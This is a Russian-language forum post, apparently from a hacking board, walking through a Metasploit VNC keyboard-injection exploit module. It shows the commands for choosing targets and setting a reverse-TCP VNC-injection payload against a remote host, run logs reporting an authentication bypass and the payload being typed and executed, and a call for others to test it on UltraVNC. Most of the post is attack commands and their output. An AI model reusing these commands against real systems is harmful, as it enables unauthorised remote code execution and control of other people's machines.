VNC Keyboard Remote Code Execution

[DarckSol]

Exploit...

Собственно очень активно тестил этот модуль......

Но вот ответа так и не дождался....

И так...

This module exploits VNC servers by sending virtual keyboard keys and executing
a payload. On Windows systems a command prompt is opened and a PowerShell or CMDStager
payload is typed and executed. On Unix/Linux systems a xterm terminal is opened
and a payload is typed and executed.

Из описания видим, что этот модуль атакует VNC Server, в результате чего выполняется наш PayLoad. Всё было как бы так, но и не совсем так....

use exploit/multi/vnc/vnc_keyboard_exec
show options

Module options (exploit/multi/vnc/vnc_keyboard_exec):

Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD no The VNC password
RHOST yes The target address
RPORT 5900 yes The target port
TIME_WAIT 20 yes Time to wait for payload to be executed


Exploit target:

Id Name
-- ----
0 VNC Windows / Powershell

msf exploit(vnc_keyboard_exec) > show targets

Exploit targets:

Id Name
-- ----
0 VNC Windows / Powershell
1 VNC Windows / VBScript CMDStager
2 VNC Linux / Unix

Собственно задаём параметр RHOST...

Выберем payload....

msf exploit(vnc_keyboard_exec) > set payload windows/vncinject/reverse_tcp

Посмотрим параметры пайлоада

msf exploit(vnc_keyboard_exec) > show options

Module options (exploit/multi/vnc/vnc_keyboard_exec):

Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD no The VNC password
RHOST 80.45.202.250 yes The target address
RPORT 5900 yes The target port
TIME_WAIT 20 yes Time to wait for payload to be executed


Payload options (windows/vncinject/reverse_tcp): //// То что нам нужно

Name Current Setting Required Description
---- --------------- -------- -----------
AUTOVNC true yes Automatically launch VNC viewer if present
DisableCourtesyShell true no Disables the Metasploit Courtesy shell
EXITFUNC process yes Exit technique (Accepted: , , seh, thread, process, none)
LHOST yes The listen address
LPORT 4444 yes The listen port
VNCHOST 127.0.0.1 yes The local host to use for the VNC proxy
VNCPORT 5900 yes The local port to use for the VNC proxy
ViewOnly true no Runs the viewer in view mode


Exploit target:

Id Name
-- ----
0 VNC Windows / Powershell

Укажем параметр LHOST, тут должен быть IP для обратной связи(BackConnect).

Запустим модуль)

[*] Started reverse handler on lovalhost.34:4444
[*] 1.2.3.4:5900 - Bypass authentication
[*] 1.2.3.4:5900 - Opening Run command
[*] 1.2.3.4:5900 - Typing and executing payload
[*] 1.2.3.4:5900 - Waiting for session...

В данном случае пайлоадом был скрипт для PowerShell
Вариант №2 VNC Windows / VBScript CMDStager

Запустим....

msf exploit(vnc_keyboard_exec) >set target 1
msf exploit(vnc_keyboard_exec) > rexploit
[*] Reloading module...

[*] Started reverse handler on 77.37.203.34:4444
[*] 1.2.3.4:5900 - Bypass authentication
[*] 1.2.3.4:5900 - Opening Run command
[*] 1.2.3.4:5900 - Typing and executing payload
[*] Command Stager progress - 8.01% done (8099/101056 bytes)
[*] Command Stager progress - 16.03% done (16198/101056 bytes)
[*] Command Stager progress - 24.04% done (24297/101056 bytes)
[*] Command Stager progress - 32.06% done (32396/101056 bytes)
[*] Command Stager progress - 40.07% done (40495/101056 bytes)
[*] Command Stager progress - 48.09% done (48594/101056 bytes)
[*] Command Stager progress - 56.10% done (56693/101056 bytes)
[*] Command Stager progress - 64.11% done (64792/101056 bytes)
[*] Command Stager progress - 72.13% done (72891/101056 bytes)
[*] Command Stager progress - 80.14% done (80990/101056 bytes)
[*] Command Stager progress - 88.16% done (89089/101056 bytes)
[*] Command Stager progress - 96.17% done (97188/101056 bytes)
[*] Command Stager progress - 100.00% done (101056/101056 bytes)
[*] 1.2.3.4:5900 - Waiting for session...

И на этом всё.... Огромная печаль((((

ЗЫ:
На случай глупых вопросов. у меня прямой/внешний ИП у виртуалки, и ранее проблем с сессиями не было никогда...

Может кто еще протестит и отпишет....

Последняя сборка UltraVNC уязвима.